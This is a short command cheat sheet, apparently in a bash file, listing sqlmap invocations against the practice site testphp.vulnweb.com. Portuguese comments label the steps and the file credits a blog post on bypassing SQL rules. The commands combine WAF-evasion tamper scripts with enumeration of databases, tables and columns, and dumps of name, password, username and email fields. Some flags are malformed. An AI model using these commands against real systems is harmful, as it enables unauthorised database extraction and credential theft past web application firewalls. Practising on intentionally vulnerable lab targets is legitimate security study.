#!/bin/bash
Creditos:
http://www.nanoshots.com.br/2016/03/sqlmap-bypass-das-regras-de-sql.html


<!--Lista os DB-->
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -level 3 --risk 3  -v4 --dbms "MySQL" --random -agent waf "modsecurity.py" 

<!-- Lista os DB-->
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -v4 --dbms "MySQL" --random-agent --tamper unmagicquotes.py,between.py,modsecurityzeroversioned.py,charencode.py --level 3 --risk 3 --dbms=mysql --flush-session --dbs  

<!-- Lista os DB + Tabelas + todas colunas-->
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -v4 --dbms "MySQL" --random-agent --tamper unmagicquotes.py,between.py,modsecurityzeroversioned.py,charencode.py --level 3 --risk 3 --dbms=mysql --flush-session --dbs -D nomeDB01 -T nomeTB01 --dump

<!-- Lista os DB + Tabelas + força colunas-->
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -v4 --dbms "MySQL" --random-agent --tamper unmagicquotes.py,between.py,modsecurityzeroversioned.py,charencode.py --level 3 --risk 3 --dbms=mysql --flush-session --dbs -D nomeDB01 -T nomeTB01 --columns

<!-- Lista os DB + Tabelas + especifica colunas-->
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -v4 --dbms "MySQL" --random-agent --tamper unmagicquotes.py,between.py,modsecurityzeroversioned.py,charencode.py --level 3 --risk 3 --dbms=mysql --flush-session --dbs -D nomeDB01 -T nomeTB01 -C name,pass,uname,email --dump 
